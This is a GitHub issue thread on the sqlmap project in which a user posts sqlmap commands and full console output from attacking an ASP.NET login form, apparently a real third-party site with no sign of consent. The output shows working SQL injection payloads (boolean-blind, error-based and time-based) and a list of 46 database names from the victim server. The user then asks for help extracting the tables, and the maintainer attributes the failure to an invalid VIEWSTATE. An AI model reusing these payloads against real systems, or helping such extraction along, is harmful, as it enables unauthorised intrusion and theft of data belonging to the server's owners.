search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.92k stars 5.67k forks source link

UNABLE TO RETRIEVE THE TABLES NAME FOR ANY DATABASE(MICROSOFT SQL SERVER 2008) #590

Closed coolrohan2292 closed 10 years ago

coolrohan2292 commented 10 years ago 
sqlmap -u "[REDACTED]" --data="__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP%2BIKII8PxpCIj%2BG%2FEtAu&1=RB_3&txtUser=sanjay+gupta&txtPW=1&btnLogin=Sign+In" -p "txtUser" --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:44:26

[10:44:26] [INFO] resuming back-end DBMS 'microsoft sql server' 
[10:44:26] [INFO] testing connection to the target URL
[10:44:26] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---
Place: POST
Parameter: txtUser
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=sanjay gupta' AND 4568=4568 AND 'YPoj'='YPoj&txtPW=1&btnLogin=Sign In

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=sanjay gupta' AND 6032=CONVERT(INT,(SELECT CHAR(113) CHAR(110) CHAR(114) CHAR(117) CHAR(113) (SELECT (CASE WHEN (6032=6032) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(120) CHAR(113) CHAR(103) CHAR(113))) AND 'zrSU'='zrSU&txtPW=1&btnLogin=Sign In

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=-7672' OR 1534=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'wiBo'='wiBo&txtPW=1&btnLogin=Sign In

---
[10:44:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[10:44:26] [INFO] fetching database names
[10:44:26] [INFO] the SQL query used returns 46 entries
available databases [46]:
[*] AccSoft_RPI
[*] AccSoftPMS
[*] Alumni
[*] ASPL
[*] BillingDesk
[*] BillingNDPS
[*] CallCenter
[*] Choutha
[*] Construct_5
[*] ExcelUpload
[*] FacultyMaster
[*] fastboc
[*] FastCoatching
[*] FastCPT
[*] fastindia
[*] fastindiacom
[*] FinSoft
[*] HO_INDORE
[*] HRManagement
[*] Idea_Inno
[*] ideainno
[*] IDRT
[*] INDORE
[*] KT_Temp
[*] master
[*] mmq_db
[*] MMQ_Demo
[*] model
[*] msdb
[*] pies
[*] pimr_dewas
[*] pimr_gw
[*] pimr_ug
[*] pimracin
[*] psa
[*] rankersonline
[*] reliancecourier
[*] rpedu
[*] RPTExpense
[*] RTC
[*] Sarvodaya_Mob
[*] SD
[*] sitebuilder7BFD9A8C0136E1441906E4F8343DFD0C
[*] stcknp
[*] StockDB
[*] tempdb

[10:44:27] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[10:44:27] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/[REDACTED]'

IT GIVES THE DATABASE NAMES SUCCESSFULLY NOT RETREIEVE TABLES FOR ANY DATABASE YOU CAN SEE BELOW.....

sqlmap -u "http://[REDACTED]/login.aspx" --data="__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP%2BIKII8PxpCIj%2BG%2FEtAu&1=RB_3&txtUser=sanjay+gupta&txtPW=1&btnLogin=Sign+In" -p "txtUser" -D tempdb --tables 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:46:07

[10:46:07] [INFO] resuming back-end DBMS 'microsoft sql server' 
[10:46:07] [INFO] testing connection to the target URL
[10:46:08] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---
Place: POST
Parameter: txtUser
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=sanjay gupta' AND 4568=4568 AND 'YPoj'='YPoj&txtPW=1&btnLogin=Sign In

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=sanjay gupta' AND 6032=CONVERT(INT,(SELECT CHAR(113) CHAR(110) CHAR(114) CHAR(117) CHAR(113) (SELECT (CASE WHEN (6032=6032) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(120) CHAR(113) CHAR(103) CHAR(113))) AND 'zrSU'='zrSU&txtPW=1&btnLogin=Sign In

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=-7672' OR 1534=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'wiBo'='wiBo&txtPW=1&btnLogin=Sign In

---
[10:46:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[10:46:08] [INFO] fetching tables for database: tempdb
[10:46:08] [WARNING] the SQL query provided does not return any output
[10:46:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:46:08] [WARNING] the SQL query provided does not return any output
[10:46:08] [WARNING] the SQL query provided does not return any output
[10:46:08] [INFO] fetching number of tables for database 'tempdb'
[10:46:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:46:08] [INFO] retrieved: 
[10:46:10] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..                                
[10:46:14] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[10:46:15] [INFO] retrieved: 
[10:46:16] [INFO] retrieved: 
[10:46:17] [INFO] retrieved: 
[10:46:18] [INFO] retrieved: 
[10:46:19] [WARNING] unable to retrieve the number of tables for database 'tempdb'
[10:46:19] [CRITICAL] unable to retrieve the tables for any database
[10:46:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 31 times

[*] shutting down at 10:46:19

I TRIED ALL 46 DATABASES BUT NONE OF THEM RETRIEVE THE TABLES NAME PLEASE HELP THANKS IN ADVANCE

stamparm commented 10 years ago

Please don't use REAL names. Redacted the original text

stamparm commented 10 years ago

Can you please say what do you get with --tables -D tempdb --parse-errors?

coolrohan2292 commented 10 years ago

first of all thank u miroslav for your response

THE FOLLOWING THINGS HAPPEN WHEN I USE --tables -D tempdb --parse-errors

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:24:15

[20:24:15] [INFO] resuming back-end DBMS 'microsoft sql server' 
[20:24:15] [INFO] testing connection to the target URL
[20:24:15] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:15] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUser
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=sanjay gupta' AND 4568=4568 AND 'YPoj'='YPoj&txtPW=1&btnLogin=Sign In

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=sanjay gupta' AND 6032=CONVERT(INT,(SELECT CHAR(113) CHAR(110) CHAR(114) CHAR(117) CHAR(113) (SELECT (CASE WHEN (6032=6032) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(120) CHAR(113) CHAR(103) CHAR(113))) AND 'zrSU'='zrSU&txtPW=1&btnLogin=Sign In

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTcwNzEwMzI4D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQUEUkJfMQUEUkJfMgUEUkJfMgUEUkJfMwUEUkJfMwUEUkJfNAUEUkJfNAUEUkJfNQUEUkJfNcfRZ43m2cODLZmnZ91USy6gP+IKII8PxpCIj+G/EtAu&1=RB_3&txtUser=-7672' OR 1534=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'wiBo'='wiBo&txtPW=1&btnLogin=Sign In
---
[20:24:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[20:24:15] [INFO] fetching tables for database: tempdb
[20:24:16] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:16] [WARNING] the SQL query provided does not return any output
[20:24:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:24:16] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:16] [WARNING] the SQL query provided does not return any output
[20:24:16] [WARNING] the SQL query provided does not return any output
[20:24:16] [INFO] fetching number of tables for database 'tempdb'
[20:24:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:24:16] [INFO] retrieved: 
[20:24:17] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:17] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:17] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:18] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'

[20:24:18] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:18] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..                                
[20:24:19] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:19] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:19] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:20] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:20] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:21] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:21] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:21] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:22] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:22] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[20:24:22] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:23] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'

[20:24:23] [INFO] retrieved: 
[20:24:23] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:24] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:24] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'

[20:24:24] [INFO] retrieved: 
[20:24:24] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:25] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:25] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'

[20:24:25] [INFO] retrieved: 
[20:24:26] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:26] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:26] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'

[20:24:26] [INFO] retrieved: 
[20:24:27] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:27] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'
[20:24:28] [WARNING] parsed DBMS error message: 'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.'

[20:24:28] [WARNING] unable to retrieve the number of tables for database 'tempdb'
[20:24:28] [CRITICAL] unable to retrieve the tables for any database
[20:24:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 31 times

[*] shutting down at 20:24:28
stamparm commented 10 years ago

VIEWSTATE is invalid. Update it with the fresh version (maybe you'll need to restart it all from the beginning). sqlmap currently does not have (full) anti-CSRF bypass mechanism

coolrohan2292 commented 10 years ago

I HAD RESTART ALL THE THINGS BUT IT IS NOT WORKING IT PRODUCE THE SAME ERRORS WHAT I CAN DO MIROSLAV PLEASE HELP ME

coolrohan2292 commented 10 years ago

PLEASE PLEASE HELP ME MIROSLAV THANKS IN ADVANCE

stamparm commented 10 years ago

VIEWSTATE was invalid as can be seen from the console output. Not a sqlmap issue

jimmwayans commented 9 years ago

having the same problem